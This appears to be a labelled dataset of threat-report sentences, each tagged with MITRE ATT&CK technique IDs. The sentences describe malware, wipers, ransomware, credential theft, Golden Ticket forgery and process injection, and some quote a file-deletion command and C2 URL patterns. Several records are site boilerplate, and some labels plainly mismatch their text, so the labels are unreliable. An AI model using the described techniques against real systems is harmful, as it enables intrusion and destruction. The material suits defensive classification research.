{"text1":"The new wave of Shamoon is accompanied by a .Net tool kit that spreads Shamoon Version 3 and the wiper Filerase","labels":"['T1569.002']"}
{"text1":"Typical file exfiltration modules deployed by threat actors usually consist of the ability to enumerate and exfiltrate files. These implants enumerate files in specific drives or directories and exfiltrate the file lists first. Once the attackers identify the files of interest, the module is instrumented for exfiltration of the files.The VBScript-based file recon module used by the attackers is somewhat different. It downloads a file listing from a remote location that contains the file paths of specific files of interest to the attackers. The file listing is so precise that the attackers know the exact file paths of the files they're looking for on an infected endpoint. This prevents re-infection of the target.A marker file is created in an attacker-specified folder and is checked before the exfiltration module begins its malicious activities. If the marker file is not found, the module will proceed with its recon and exfiltration activities.In August 2021, we saw a minor variation of the same script being deployed in the wild. Instead, it's hardcoded into the scripts showing that the attackers already know the identities of the targets that they are trying to infect. This indicates that this is a highly targeted attack.In October 2021, we observed another update in the file exfiltration scripts","labels":"['T1083']"}
{"text1":"After achieving access to staging targets, the threat actors installed tools to carry out operations against intended victims. On one occasion, threat actors installed the free version of FortiClient, which they presumably used as a VPN client to connect to intended target networks","labels":"['T1105']"}
{"text1":"NCCIC observed multiple methods used by NotPetya to propagate across a network. The first and\u2014in most cases\u2014most effective method, uses a modified version of the Mimikatz tool to steal the user\u2019s Windows credentials. The cyber threat actor can then use the stolen credentials, along with the native Windows Management Instrumentation Command Line (WMIC) tool or the Microsoft SysInternals utility, psexec.exe, to access other systems on the network. Another method for propagation uses the EternalBlue exploit tool to target unpatched systems running a vulnerable version of SMBv1","labels":"['T1003.001']"}
{"text1":"At face value, ISMInjector is obfuscated with the off-the-shelf SmartAssembly .NET obfuscator created by red-gate.com. The first execution of ISMInjector starts by copying itself to %localappdata%\\srvBS.txt and enables persistent access to the system","labels":"['T1027']"}
{"text1":"Speaking on the vulnerability leveraged by this attack, while we spotted the attack performed via Office 2007 running on Windows XP, this is actually a fault existing in a TIFF-processing component shipped with Microsoft Office. Therefore, not only are Office 2007 with Windows XP vulnerable to this attack, but also more environments are affected by this vulnerability. In addition, our later research showed this exploit also works on Office 2007 running on Windows 7. The Labs has been actively working on getting every piece of details of this exploit, we may share our additional findings in the near future","labels":"['T1203']"}
{"text1":"Volexity has identified multiple new attack campaigns being launched by OceanLotus via multiple fake websites and Facebook pages that have been set up within the last year. In addition to targeting those within Vietnam, Volexity has seen renewed targeting of OceanLotus's neighbors throughout Southeast Asia. These websites have been observed profiling users, redirecting to phishing pages, and being leveraged to distribute malware payloads for Windows and OSX. This post will focus on one of the larger campaigns where OceanLotus has leveraged multiple fake news websites to target users","labels":"['T1585.001']"}
{"text1":"modifying permissions, modifying credentials, adding or changing permission groups, modifying account settings, or modifying how authentication is performed) to maintain access to credentials and certain permission levels within an environment (Account Manipulation [T1098]) - Steal the credentials of a specific user or service account to bypass access controls and retain access to remote systems and externally available services (Valid Accounts [T1078]) - Use the Task Scheduler to run programs at system startup or on a scheduled basis for persistence, conduct remote execution for lateral movement, gain SYSTEM privileges for privilege escalation, or run a process under the context of a specified account (Scheduled Task\/Job [T1053]) - Abuse the Windows DLLs search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence (Hijack Execution Flow: DLL Search Order Hijacking [T1056.004]) - Exploit hooking to load and execute malicious code within the context of another process to mask the execution, allow access to the process\u2019s memory, and, possibly, gain elevated privileges (Input Capture: Credential API Hooking [T1574.001]) - Use remote services to persist within a victim\u2019s network (External Remote Services [T1133","labels":"['T1505.003', 'T1569.002', 'T1053.005']"}
{"text1":"The shellcode uses a 16-byte XOR key for decrypting the data as shown in Figure 10","labels":"['T1140']"}
{"text1":"Recent samples, with the ability to discover wireless network settings and credentials will spawn an instance of netsh.exe after a brief sleeping period (after launch). The syntax utilized initially is","labels":"['T1016']"}
{"text1":"TA551 has distributed different families of malware, including Ursnif (Gozi\/ISFB), Valak and IcedID. TA551 malspam spoofs legitimate email chains based on data retrieved from previously infected Windows hosts. This is a generic statement asking the recipient to open an attached ZIP archive using the supplied password. File names for the ZIP archives use the name of the company being spoofed in the email. For example, if the spoofed sender is someone@companyname.com, the ZIP attachment would be named companyname.zip. In 2020, we also started seeing emails with info.zip or request.zip as the attached ZIP archive names. These password-protected ZIP attachments contain a Word document with macros to install malware. File names for the extracted Word documents follow noticeable patterns that have evolved as this campaign has progressed. URLs generated by the associated Word macros also follow noticeable patterns that have also evolved as this campaign has progressed","labels":"['T1566.001']"}
{"text1":"This section describes how we identified additional Stealth Falcon victims and bait content, and traced Stealth Falcon\u2019s spyware to additional C2 servers","labels":"['T1071.001']"}
{"text1":"Talos has identified two different infection vectors associated with this particular campaign. The first vector relies on a trojanized document that fetches a remote template and then uses a known exploit. The second vector is a trojanized Word document that prompts the victim to enable macros and run a Visual Basic script. Once the luncher.doc was downloaded, it used CVE-2017-11882, to execute code on the victim's machine. The stager will be described in more detail in the next section","labels":"['T1059.001']"}
{"text1":"Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections. The command also controls persistent net connections. Used without parameters, net use retrieves a list of network connections","labels":"['T1070.005']"}
{"text1":"The malware then allows the user to open the file as normal without any indication to the user that anything has occurred","labels":"['T1074.001']"}
{"text1":"These keystrokes would run PowerShell commands that downloaded and installed various malware strains that acted as backdoors for the attackers into the victims\u2019 networks","labels":"['T1091']"}
{"text1":"SlideShare uses cookies to improve functionality and performance, and to provide you with relevant advertising. This talk will showcase the obstacles overcome during one of the largest and most advanced breaches Mandiant has ever responded to, the novel investigative techniques employed, and the lessons learned that allowed us to help remediate it. Details a massive intrusion by Russian APT29 (AKA CozyDuke, Cozy Bear) . Every IR presents unique challenges. This talk will showcase the obstacles overcome during one of the largest and most advanced breaches Mandiant has ever responded to, the novel investigative techniques employed, and the lessons learned that allowed us to help remediate it. RAR) included deleted items in Accessed Files STEALTHYATTACKER FUN FACT: Now it\u2019s built-in. DERBYCON 2016 #NOEASYBREACH Matt Dunwoody @matthewdunwoody Nick Carr @itsreallynick 22 likes . Views . You have now unlocked unlimited access to 20M+ documents. Unlimited Reading . Learn faster and smarter from top experts . Unlimited Downloading . Download to take your learnings offline and on the go . You also get free access to Scribd. Instant access to millions of ebooks, audiobooks, magazines, podcasts and more. Free access to premium services like Tuneln, Mubi and more. Enjoy access to millions of ebooks, audiobooks, magazines, and more from Scribd","labels":"['T1070.004']"}
{"text1":"In the course of our research we uncovered the activity of a hacking group which has Chinese origins. This group was named \u201cWinnti","labels":"['T1083']"}
{"text1":"Pass Logger -> a credential stealer, used for stealing credentials stored in the Chrome, Firefox and Opera browsers","labels":"['T1555.003']"}
{"text1":"Note: the NTRUEncrypt public key cryptosystem encryption algorithm (NTRU), is a lattice-based alternative to Rivest-Shamir-Adleman, known as RSA, and Elliptic-curve cryptography, or ECC, and is based on the shortest vector problem in a lattice","labels":"['T1486']"}
{"text1":"On June 28, 2020, our Threat Fusion team identified a new file being downloaded by the Aisino Intelligent Tax product. Rather, this new sample\u2019s sole mission is to delete GoldenSpy and remove any trace it existed. Including the deletion of registry entries, all files and folders (including the GoldenSpy log file), and finally, the uninstaller deletes itself with the following command: cmd.exe \/c del \/q C:\\Users\\admin\\AppData\\Local\\Temp\\AWX.exe. Note the \u201c\/c\u201d which will terminate the Windows Command-line interface after the operation is completed and \u201c\/d\u201d which will delete without asking permission or giving any notification","labels":"['T1070.004']"}
{"text1":"A malware variant named Mal\/Miner-C (also known as PhotoMiner) is infecting Internet-exposed Seagate Central Network Attached Storage (NAS) devices and using them to infect connected computers to mine for the Monero cryptocurrency","labels":"['T1080']"}
{"text1":"The role of Torisma is to monitor for new drives added to the system as well as remote desktop connections. This appears to be a more specialized implant focused on active monitoring on a victim\u2019s system and triggering the execution of payloads based on monitored events. The end objective of Torisma is executing shellcode on the victim\u2019s system and sending the results back to the C2","labels":"['T1049']"}
{"text1":"PsExec is then used to launch PowerShell which uses the win32_service WMI class to retrieve services and the net stop command to stop these services. After Windows Defender is disabled and services have been stopped across the organization, PsExec is used to launch the WastedLocker ransomware itself, which then begins encrypting data and deleting shadow volumes","labels":"['T1562.001', 'T1489', 'T1007']"}
{"text1":"The file named \u2018lsass.exe\u2019 was downloaded from win10-update[.]com via an HTTP request. The win10-update[.]com domain has been noted in open source as an indicator associated with Chafer threat operations. The lsass.exe file downloaded from this domain is a previously unreported python-based payload that we are currently tracking as MechaFlounder. We believe Chafer uses MechaFlounder as a secondary payload that the group downloads from a first-stage payload to carry out its post-exploitation activities on the compromised host","labels":"['T1036.005']"}
{"text1":"Ryuk attempts to encrypt all mounted drives and hosts that have Address Resolution Protocol (ARP) entries (IP addresses) and it enumerates all mounted drives by calling GetLogicalDrives. For each mounted drive, Ryuk calls GetDriveTypeW to determine the drive\u2019s type. To retrieve IP addresses that have ARP entries, Ryuk calls GetIpNetTable. It iterates through all entries and then tries to enumerate files and folders on the remote host and encrypt the files","labels":"['T1057']"}
{"text1":"With this approach, the attacker ensures that there is no direct execution (the executable is executed thanks to scheduled tasks), there's no download of an additional payload, and finally, the author uses the fact that the docx format is an archive in order to include its executable (GravityRAT","labels":"['T1053.005']"}
{"text1":"The macros are different. In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content. In the new campaign JavaScript files have been used to execute batch and PowerShell files. The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file. The new campaign has used two different UAC bypass techniques based on the victim\u2019s OS while in the old one the actor only used the Token Impersonation technique. In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated. It also does not use FTP for exfiltration","labels":"['T1059.003']"}
{"text1":"When the attackers need to send a file or command to the victim machine, they place them to the folder named d in the victim\u2019s Dropbox folder. The malware retrieves this folder and downloads all its contents to the working folder","labels":"['T1074.001', 'T1567.002']"}
{"text1":"A Python script was created for the purpose of automating this configuration file decoding process. The output of this script when run against the configuration file used by the first of the two Parliamentarian operation samples yielded the following data","labels":"['T1059.006']"}
{"text1":"Conficker will copy itself with a random name into the system directory %systemroot%\\system32 and register itself as a service","labels":"['T1543.003']"}
{"text1":"The threat actor accomplished this by using administrative accounts to connect via SMB to targeted users, and then copy their Chrome profile directories as well as data protection API (DPAPI) data. In Windows, Chrome cookies and saved passwords are encrypted using DPAPI","labels":"['T1021.002']"}
{"text1":"This time, the text is from the novel \"The Brothers Karamazov\" by Fyodor Dostoevsky (a Russian writer). The malicious document drops a Python interpreter and PoetRAT. The author made a few changes to the PoetRAT malware, though. First, the malware uses pyminifier to obfuscate the Python script and avoid detection based on string or YARA rules: The obfuscation is a base64 and an LZMA compression algorithm. Secondly, the author split the malware in a couple of different files. For example, the variables are stored in a \"Constant.py\" file containing the C2 server and the configuration. The most notable change is the protocol used to download and upload files","labels":"['T1105']"}
{"text1":"Next, the loader fingerprints the Windows architecture. This is a crucial step because the loader needs to know what version of the backdoor to download (32-bit or 64-bit). Once the Windows architecture has been identified, the loader carries out the download","labels":"['T1197']"}
{"text1":"Contacts an IP address \/ domain that was used to host a malicious document from a Lazarus previous campaign in 2017 - Same author appeared in these recent malicious documents that also appeared back in Lazarus 2017 campaigns - Uses the same malicious document structure and similar job recruitment ads as what we observed in past Lazarus campaigns - The techniques, tactics and procedures align with Lazarus group\u2019s interest in crypto currency theft","labels":"['T1001.003']"}
{"text1":"Check the email sender, subject, and body for anything suspicious before downloading and opening email attachments. Check the file extension of the attached file and make sure it is the intended file format. Avoid activating macro for any attached Microsoft Office files, especially for emails that request macro activation using an image of the body of the opened file or those that don\u2019t show anything. Subtle changes to a popular URL can be one indicator of malicious content","labels":"['T1204.002']"}
{"text1":"1) Checks if the user has Administrator privilege 2) Drops the Cobalt Strike Stager in debug or \u201c%TEMP%\u201d directory as \u201ctmp_FlVnNI.dat\u201d depending on the user privilege 3) Opens the decoy Word document 4) Locates the InstallUtil.exe and its installed version 5) Copies \u201cschtasks.exe\u201d to \u201c%TEMP%\u201d directory and renames it to \u201cwtask.exe\u201d 6) Creates Scheduled tasks with the name \u201cSecurity Script kb00855787\u201d 7) Renames \u201cwscript.exe\u201d into \u201cwinwsh.exe\u201d 8) Runs the scheduled task to execute the Cobalt Strike Stager 9) C2 communication","labels":"['T1053.005']"}
{"text1":"The information that the malware gets from the victim machine can be the user name, the machine name, the domain where the machine belongs or, if not, the workgroup, the product name (operating system name), etc","labels":"['T1082', 'T1082']"}
{"text1":"While the decoy in Figure 2 is displayed, the macro will search the document for the delimiter ###$$$ and write the base64 encoded text that follows this delimiter to the file %APPDATA%\\Base.txt. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents. As seen in the above request, the Trojan will generate a URL for its beacon with the following structure: http:\/\/<c2 domain>\/chk. hex(Environment.UserName\/Environment.MachineName)> The Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a command for the Trojan to run. The C2 server will respond to the Trojan\u2019s request by echoing the value <hex(Environment.UserName\/Environment.MachineName)> if it wishes to provide additional commands. If the C2 server does not respond with the appropriate echoed data, the Trojan will create a file named srvCheckresponded.tmp in the SpecialFolder.CommonApplicationData folder and write nothing to it before exiting. If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what commands the C2 wishes to run by issuing a request to the following URL: http:\/\/<c2 domain>\/what. hex(Environment.UserName\/Environment.MachineName)> After issuing the what command, the Trojan will parse the C2's response for the string Oops, which the Trojan will treat as the C2 making a mistake and will exit. Otherwise, the Server will respond with a command followed by a set of parameters, split up by the delimiter <>: [command]<>[parameters for command in hexadecimal format] The available commands are","labels":"['T1105', 'T1030']"}
{"text1":"Update the RAT and Keylogger remotely - Set an autostart JavaScript to run on RAT startup - A Domain Generation Algorithm (DGA) for C2 resiliency - If the user has admin permissions, it deletes shadow copies using vssadmin.exe","labels":"['T1568.002']"}
{"text1":"The wiper is relatively small in size and dynamically resolves most of the APIs it uses. Before starting any file destruction, it checks to ensure that the machine is not a domain controller. If the machine is a domain controller, it stops execution. Pseudo-code: CaddyWiper checking for the Domain Controller role of the machine. If the system is not a domain controller, the wiper will destroy files on \"C:\\Users,\" followed by wiping of all files in the next drive letter until it reaches the \"Z\" drive. This means that the wiper will also attempt to wipe any network mapped drive attached to the system","labels":"['T1082']"}
{"text1":"While we do not have data supporting targeting information or telemetry, we know the document was created in January 2018 and likely used in an attack around that time frame. The QUADAGENT payload dropped by the delivery document had the filename AdobeAcrobatLicenseVerify.ps1 and used acrobatverify[.]com for its C2. We used this QUADAGENT payload when testing the Invoke-Obfuscation tool mentioned in this blog. QUADAGENT Analysis The final payload delivered in all three attack waves is a PowerShell downloader referred to by other research organizations as QUADAGENT. The downloaders in these attacks were configured to use both rdppath[.]com and cpuproc[.]com as their C2 servers. When communicating with its C2 server, the downloaders use multiple protocols, specifically HTTPS, HTTP or DNS, each of which provide a fallback channel in that order. For instance, the downloader will first attempt to communicate with its C2 server using an HTTPS request. If that HTTPS request is not successful, the downloader will issue an HTTP request. Lastly, if the HTTP request is not successful, the downloader will fallback to using DNS tunneling to establish communications. The downloader will use the filename of the script (ex","labels":"['T1071.001']"}
{"text1":"As soon as the user enabled the macro, a robust Visual Basic Application (VBA) script began to execute. First, it would query Windows Management Instrumentation (WMI) to check if any of the following applications were running","labels":"['T1047']"}
{"text1":"Note that .hwp is the extension used by Hangul Word Processor from Hangul Office, which is very popular in South Korea","labels":"['T1036.005']"}
{"text1":"We believe that the source of all these stolen certificates could be the same Winnti group. Either this group has close contacts with other Chinese hacker gangs, or it sells the certificates on the black market in China","labels":"['T1553.002']"}
{"text1":"Summary . The following knowledgebase will explain the uses of Net commands in Windows Operating Systems. More information . Net Commands On Windows Operating Systems . The following Net Commands can be used to perform operations on Groups, users, account policies, shares, and so on. NET . The \"Net Accounts\" command is used to set the policy settings on local computer, such as Account policies and password policies. This command can't be used on domain controller. When you type Net Accounts, you will see the default settings of the Account Lockout policy and Password Policy in local computer show as: The above settings displayed as per the role of the computer. Community Solutions Content Disclaimer . Microsoft corporation and\/or its respective suppliers make no representations about the suitability, reliability, or accuracy of the information and related graphics contained herein. User Account Control and remote restrictions - Windows Server Describes User Account Control (UAC) and remote restrictions in Windows Vista. auditpol get Reference article for the auditpol get command, which retrieves the system policy, per-user policy, auditing options, and audit security descriptor object. wevtutil Reference article for wevtutil, which lets you retrieve information about event logs and publishers. Manage cookies - Previous Version Docs - Blog - Contribute - Privacy & Cookies - Terms of Use - Trademarks - \u00a9 Microsoft 2022 - Summary - More information - - - - Manage cookies - Previous Version Docs - Blog - Contribute - Privacy & Cookies - Terms of Use - Trademarks - \u00a9 Microsoft 2022","labels":"['T1087.002']"}
{"text1":"In this blog, we described how Redaman has become more effective by hiding dynamic C&C server addresses inside the Bitcoin blockchain","labels":"['T1102.001']"}
{"text1":"As part of our investigation, we monitored exactly what the cybercriminals did on an infected PC. In particular, they they downloaded an auxiliary program ff._exe to the Config.Msi folder on the infected machine","labels":"['T1105']"}
{"text1":"Looking at the binaries for SUNBURST and TEARDROP, we\u2019ve learned that even this wildly successful operation had its rough edges. Far from a worry-free power trip, the attackers were wary all the while of having their activity seen at all, never mind recognized for what it was; extensive blacklists of domains and processes had to be created to make sure of that","labels":"['T1027']"}
{"text1":"Email* - - * I agree to provide my email address to \u201cAO Kaspersky Lab\u201d to receive information about new posts on the site. I understand that I can withdraw this consent at any time via e-mail by clicking the \u201cunsubscribe\u201d link that I find at the bottom of any e-mail sent to me for the purposes mentioned above. I agree to provide my email address to \u201cAO Kaspersky Lab\u201d to receive information about new posts on the site. I understand that I can withdraw this consent at any time via e-mail by clicking the \u201cunsubscribe\u201d link that I find at the bottom of any e-mail sent to me for the purposes mentioned above","labels":"['T1204.001']"}
{"text1":"This turned out to be the best solution, as the Cobalt group set up a controlled botnet in the bank's network which was very difficult to track and even harder to stop. In october 2016 Group-IB published the report about the Cobalt group. Initially the Cobalt group focused on jackpotting ATMs: they launched a program that sent commands directly to the dispenser to issue cash. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. For organizations that perform timely updates of their systems and adhere to strict security policies, the Cobalt group employs another method to deliver malicious code through emails with Word documents containing a malicious macro. When opening the document, the user must click on the \"Enable content\" button, which enables macros (fig. 5 Example of an email message with a Word document, which, when opened, requires the user to click on the \"Enable content\" button to enable a malicious macro. 6 Example of a message sent by attackers from a domain whose name is similar to the name of a real domain . As soon as the attachment is launched and the malicious code is executed, the Cobalt Strike payload is loaded in the memory. In addition, Cobalt Strike enables users not to expose a fragment of memory allocated in the context of another process, the RWX (Read, Write, Execute) attributes, which often reveal injected code","labels":"['T1059.005']"}
{"text1":"The Zip archive is encrypted with an unknown password, but we know it contains two files named joboffer.chm and thumb.db. The joboffer.chm file is a compiled HTML file that we believe loads and executes the \u2018thumb.db\u2019 file as a payload, but we cannot be absolutely sure as we do not have the password required to extract the files from the archive","labels":"['T1218.001']"}
{"text1":"Recently, after looking at the difference between 0vercl0ck\u2019s proof of concept and the real deal, a friend asked me \u201cWhy does PowerLoader go to all the trouble of using ROP chains instead of just executing the shellcode like 0vercl0ck does. PowerLoader gets the malicious code into the process by opening an existing, shared section already mapped into explorer, removing the need to allocate heap space or overwrite process memory. By opening \u201cShell_TrayWnd\u201d and calling SetWindowLong, PowerLoader is able to set a variable used by the window procedure to point to a specific address in its shellcode. The read part won\u2019t trigger DEP (Data Execution Prevention), if the section is not executable (in later versions of windows it is execute-protected), however if EAX points to an address inside the section, DEP will be triggered. Well how does one get from KiUserApcDispatcher to code execution, without executing the non-executable shellcode, I hear you ask. Next it pops the return address into the EAX and then calls it, this results in execution being transferred back to the Window Procedure. The sequences are instruction within the executable regions of explorer\u2019s memory, their purpose is to perform certain operations as PowerLoader can\u2019t execute any of its own code yet, due to the section being execute-protected. 00100E28 points to some code in explorer that executes the instruction \u201cSTD\u201d followed by \u201cRET\u201d, As a result the instruction underlined in red will result in the direction flag being set and execution being returned to the Window Procedure. Well these bytes were found, in this case inside some random shell32 function (it doesn\u2019t matter). Now the pointer doesn\u2019t point to the start of the function, it points somewhere in the middle, as a result, only the bytes in the red box are executed. Remember: because all addresses points to executable code within explorer address space, and they are called using a pointer, no code in the shellcode is actually executed, thus resulting in no nasty DEP errors","labels":"['T1055.011']"}
{"text1":"Then calls the fcL4qOb4 function to set the scheduled task and disguise as the one used by Google","labels":"['T1036.004', 'T1053.005']"}
{"text1":"This module has been described before in the article here. The first instructions in the main function hide the console window from the user. Afterward, the module will delete old \"sft\" files assuming they were already exfiltrated. After a pause of 6,500 milliseconds, it will start its search for the targeted files","labels":"['T1564.003']"}
{"text1":"Once in the folder, this property list (plist) file will launch the CrashReporter program with the Maintain parameter on system load as Root for every user. Because the LaunchDaemon will not run automatically after the plist file is moved, the postinstall script launches CrashReporter with the Maintain parameter and runs it in the background (Create or Modify System Process: Launch Daemon [T1543.004","labels":"['T1569.001']"}
{"text1":"Researchers also observed that the backdoor downloads and executes the Cobalt Strike pentesting and post-exploitation toolkit on the victim's machine within some period of time after the infection. By deploying Cobalt Strike, it is clear that this stealthy backdoor is being used to gain a foothold\u00a0in corporate networks so that ransomware can be deployed, data can be stolen, or network access could be sold to other threat actors","labels":"['T1105']"}
{"text1":"Stop the running xmlprov service - Copy dropped xmlprov.dll and xmlrov.ini into the system32 directory and delete them from the current directory - Check if xmlProv service is installed or not and if it is not installed create the service through svchost.exe - Modify the xmlProv service values including type and binpath - Add xmlProv to the list of the services to be loaded by svchost - add xmlProv to the xmlProv registry key - Start the xmlProv service","labels":"['T1112']"}
{"text1":"We found malicious code injected into a JavaScript library provided by Volusion to their client shops. The injected code loaded another JavaScript stored on a Google Storage service. The loaded script is almost a direct copy of a normal JavaScript library but has a credit card skimmer carefully integrated. When customers submit their payment information, the skimmer will copy and send the personal information and credit card details to an exfiltration server belonging to the attackers","labels":"['T1059.007']"}
{"text1":"HAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control. Once they\u2019ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA","labels":"['T1567.002']"}
{"text1":"We believe that the threat actors behind the Frankenstein campaign are moderately sophisticated and highly resourceful. The actors' preference for open-source solutions appears to be part of a broader trend in which adversaries are increasingly using publicly available solutions, possibly to improve operational security. This report outlines the various anti-detection techniques used throughout the Frankenstein campaign. Some of these techniques included checking to see if any analysis tools, such as Process Explorer, were running in the background and determining whether the sample was inside of a virtual machine. The threat actors also used different types of encryption in order to protect data in transit","labels":"['T1497.001']"}
{"text1":"Then it uses a net use command to connect to the network drive. It then checks, in a loop, as shown in Figure 12, if a command is available. It writes the command results in another OneDrive subfolder and encrypts it with the XOR key 0xAA","labels":"['T1027']"}
{"text1":"As part of this research, I reached out to Benjamin Delpy, author of Mimkatz, and requested he add \u201cSID History\u201d to Mimikatz forged Kerberos tickets. The June 28th version of Mimikatz now includes the capability to include arbitrary SIDs in SID History on forged tickets. When a user is authenticated, the SIDs of every security group the user is a member of is added to the user\u2019s Kerberos ticket, as well as any SIDs in the user\u2019s SID History. Golden Tickets . Golden Tickets are forged Ticket-Granting Tickets (TGTs), also called authentication tickets. In other words, in a mult-domain AD forest, if the domain the Golden Ticket was created in doesn\u2019t contain the Enterprise Admins group, the Golden Ticket won\u2019t provide admin rights to other domains in the forest. The standard Golden Ticket is limited to the child domain it was created in, so now we add SID History to the equation\u2026 . Golden Ticket + SID History = WINNING. Things get more interesting once Mimikatz supports SID History in Golden Tickets (and Silver Tickets) since any group in the AD Forest can be included and used for authorization decisions. In order to support my research into how to expand access using SID History in Kerberos tickets across trusts (both intra-forest and external), I reached out to Benjamin Delpy in late June and requested SID History be added. Using the latest version of Mimikatz, we can now add SID History to the Golden Ticket for the Forest Enterprise Admins group. In summary, Golden Tickets can now be used to compromise any domain in the AD Forest once a single one is compromised","labels":"['T1134.005']"}
{"text1":"In this campaign, Earth Vetala threat actors used spearphishing emails and lure documents against organizations within the United Arab Emirates, Saudi Arabia, Israel, and Azerbaijan. The phishing emails and lure documents contain embedded URLs linking to a legitimate file-sharing service to distribute archives containing the ScreenConnect remote administrator tool","labels":"['T1204.001']"}
{"text1":"Capabilities of the NETWIRE backdoor include key logging, reverse shell, and password theft. The backdoor uses a custom encryption algorithm to encrypt data and then writes it to a file created in the .\/LOGS directory","labels":"['T1074.001', 'T1560.003']"}
{"text1":"The ScreenUtil module, which was first reported in 2017, takes a screenshot of the current user's desktop. All variants analyzed by CTU researchers were hard-coded to drop the captured image files to %APPDATA%\\Update\\Tmp","labels":"['T1113']"}
{"text1":"If the \u2018-p\u2019 parameter has been passed into the command line, the loader proceeds to download the Team9 backdoor directly from the command and control server. One notable addition is the process injection (hollow process injection) when the backdoor has been successfully downloaded and decrypted. The loader injects the backdoor to one of the following processes","labels":"['T1055.012', 'T1055.013']"}
{"text1":"Log keystrokes and the titles of open windows - Gather clipboard data and system information - Steal printer information and any documents that were sent to be printed - Record audio - Capture screenshots and webcam photos","labels":"['T1120']"}
{"text1":"The UprotectData() method treats the first two bytes of the Base64 decoded value as a two-byte XOR key","labels":"['T1573.001', 'T1560.003']"}
{"text1":"We had previously observed this same IP scanning for TCP port 7001 throughout May 2018. This was potentially a scan for Oracle WebLogic servers, which listens on TCP port 7001 by default. In both our samples, as well as the ones that Morpheus Labs described, the hard-coded password was not only identical, but also located at the same offset","labels":"['T1046']"}
{"text1":"The server uses folders in the current directory to store information sent and received from WellMess backdoors and the folder layout is shown in Figure 2. Additionally, the server uses a private key and certificate located in the current working directory during mutual TLS connections","labels":"['T1573.002']"}
{"text1":"An uptick in activity from GRIM SPIDER, a subgroup of the criminal enterprise CrowdStrike Intelligence tracks as WIZARD SPIDER, has led to the identification of consistent actions employed to carry out their attacks. As part of their initial compromise \u2014 usually as a download from a spam email \u2014 they gain a foothold with their modular TrickBot malware, which was developed and is principally operated by WIZARD SPIDER. Once TrickBot is executed, new enumeration modules are downloaded onto the compromised machine to facilitate WIZARD SPIDER\u2019s spread in search of credentials with the aim of gaining access to the domain controller. The criminal actors use RDP to perform lateral movement and explore the victim environment, with an end result of gaining access to the domain controller. Once this access has been achieved, GRIM SPIDER is able to deploy the Ryuk ransomware to the entire network. These observations come from system log data, CrowdStrike Falcon\u00ae sensor telemetry, and the output of the Falcon Forensic Collector (a customized version of CrowdStrike\u2019s freely distributed community tool, CrowdResponse","labels":"['T1570']"}
{"text1":"As shown in Figure 11, after compromising an initial victim's system (patient 0), the threat actors use the Baidu search engine to search for the victim's organization name. They then identify the Exchange server and attempt to install the OwaAuth web shell. If the OwaAuth web shell is ineffective because the victim uses two-factor authentication for webmail, the adversaries identify other externally accessible servers and deploy ChinaChopper web shells. Within six hours of entering the environment, the threat actors compromised multiple systems and stole credentials for the entire domain","labels":"['T1003.002', 'T1003.004', 'T1003.001']"}
{"text1":"Displays and modifies entries in the Address Resolution Protocol (ARP) cache, which contains one or more tables that are used to store IP addresses and their resolved Ethernet or Token Ring physical addresses. Used without parameters, arp displays help","labels":"['T1018']"}
{"text1":"We found that a domain admin account was compromised and the Active Directory audit tool PingCastle was run. Using the domain admin, the actor was able to compromise several other accounts and execute malicious services and persistence mechanisms, namely SDBbot RAT Loaders","labels":"['T1078.002']"}
{"text1":"KillDisk is designed to run with high privileges, this time it registers itself as a service under Plug-And-Play Support name","labels":"['T1036.004']"}
{"text1":"Static Kitten is distributing at least two URLs that deliver two different ZIP files that are themed to be relevant to government agency employees. The URLs are distributed through phishing emails with lure and decoy documents. An example lure is shown in Figure 2 below","labels":"['T1204.001']"}
{"text1":"The attackers also used a malicious tool that they named BCS-server. This tool allows them to open a tunnel into an internal network and then this tunnel can be used to send and receive data between the C&C server and even non-infected computers in the network. The main idea of this tool is based on the same principles as the XTUNNEL malware used by the Sednit group","labels":"['T1140']"}
{"text1":"The recipient clicked the link and proceeded to download and open a malicious HTML executable file, which in turn loaded content from a C&C server via an embedded iframe","labels":"['T1204.001']"}
{"text1":"The initial CVE-2019-19781 exploitation activity on January 20 and January 21, 2020, involved execution of the command \u2018file \/bin\/pwd\u2019, which may have achieved two objectives for APT41. Second, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step","labels":"['T1083']"}
{"text1":"Cadelspy compresses all of the stolen data into a .cab file and uploads it to the attacker\u2019s C&C servers","labels":"['T1560']"}
{"text1":"HAWKBALL is a backdoor that communicates to a single hard-coded C2 server using HTTP. The C2 server is obtained from the decrypted config file, as shown in Figure 5","labels":"['T1071.001']"}
{"text1":"PowerStallion is a lightweight PowerShell backdoor using Microsoft OneDrive, a storage service in the cloud, as C&C server","labels":"['T1102.002']"}
{"text1":"26, 2018) used a macro-based document that dropped a VBS file and an INI file. The INI file contains the Base64 encoded PowerShell command, which will be decoded and executed by PowerShell using the command line generated by the VBS file on execution using WScript.exe","labels":"['T1140']"}
{"text1":"For alerts raised either by specific threat intelligence tied to activity groups or by more generic suspicious behaviors, Windows Defender ATP provides rich, visualized technical context. In the screenshots below, Windows Defender ATP clearly presents the Winnti installation where an installer drops a DLL to disk (Figure 5), loads the DLL using rundll32 (Figure 6), sets the DLL as a service (Figure 7), and saves a copy of itself in C:\\Windows\\Help (Figure 8","labels":"['T1218.011']"}
{"text1":"It continues to perform a number of checks for installed security products on the victim machine. The following security platforms are queried by checking entries within the HKLM\\Software\\ registry path","labels":"['T1518.001']"}
{"text1":"Earth Vetala used spearphishing emails with embedded links to a legitimate file-sharing service to distribute their malicious package","labels":"['T1583.006']"}
